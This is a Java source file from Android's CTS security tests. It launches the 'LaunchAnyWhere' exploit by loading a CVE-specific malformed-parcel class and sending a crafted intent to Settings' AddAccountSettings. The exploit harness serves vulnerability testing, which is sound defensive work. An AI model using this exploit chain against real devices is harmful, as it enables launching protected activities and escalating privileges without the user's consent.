/*
 * Copyright (C) 2018 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package com.android.security.cts.launchanywhere;

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;

public class StartExploit extends Activity {
    protected static final String TAG = "LaunchAnyWhere";

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        String exploitName = "com.android.security.cts.launchanywhere." +
            getIntent().getStringExtra("cve");

        String classAccessMessage = "Please ensure that the class is part of "
            + "the com.android.security.cts.launchanywhere package";

        try {
            Authenticator.exploit =
                (IGenerateMalformedParcel) Class.forName(exploitName)
                    .newInstance();
        } catch (ClassNotFoundException e) {
            Log.e(TAG, "Unable to load the class " + exploitName + "! " +
                    classAccessMessage);
            e.printStackTrace();
            return;
        } catch (InstantiationException e) {
            Log.e(TAG, "Unable to instantiate the exploit! " + exploitName);
            e.printStackTrace();
            return;
        } catch (IllegalAccessException e) {
            Log.e(TAG,
                "Unable to access class " + exploitName + "! " +
                classAccessMessage + " and is not private");
            e.printStackTrace();
            return;
        }

        Intent attacker = new Intent();
        attacker.setComponent(new ComponentName(
            "com.android.settings",
            "com.android.settings.accounts.AddAccountSettings"));
        attacker.setAction(Intent.ACTION_RUN);
        attacker.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        String authTypes[] = {"com.launchanywhere"};
        attacker.putExtra("account_types", authTypes);
        startActivity(attacker);
    }
}